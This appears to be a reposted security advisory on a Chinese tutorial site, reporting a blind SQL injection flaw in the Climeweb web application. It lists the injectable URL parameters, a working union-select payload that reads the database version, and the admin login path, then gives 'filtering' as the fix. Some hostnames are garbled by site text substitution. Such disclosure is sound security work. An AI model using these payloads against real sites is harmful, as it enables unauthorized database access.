好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Climeweb盲注缺陷及修复 - 网站安全 - 自学php

 

标题: Climeweb Blind SQL Injection Vulnerability

作者: poach3r HdhCmsTest2cto测试数据

下载 地址: http://HdhCmsTestclimeweb测试数据/

测试平台: Windows XP SP3

 

测试:

 

http://HdhCmsTest2cto测试数据 /path/indux.php?id=[SQL]

 

http://HdhCmsTest2cto测试数据 /path/newsdetails.php?News_Id=[SQL]

 

示例:

 

http://HdhCmsTest2cto测试数据 /path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--

 

# 管理登陆入口:

 

http://HdhCmsTest2cto测试数据 /path/admin/login.php

 

==========================================================================

修复:过滤

查看更多关于Climeweb盲注缺陷及修复 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11211
  阅读:47次

上一篇: openEngine 2.0多个盲注缺陷及修复 - 网站安全 - 自学

下一篇:shopex密码取回处新生成密码可预测漏洞及修复方

相关资讯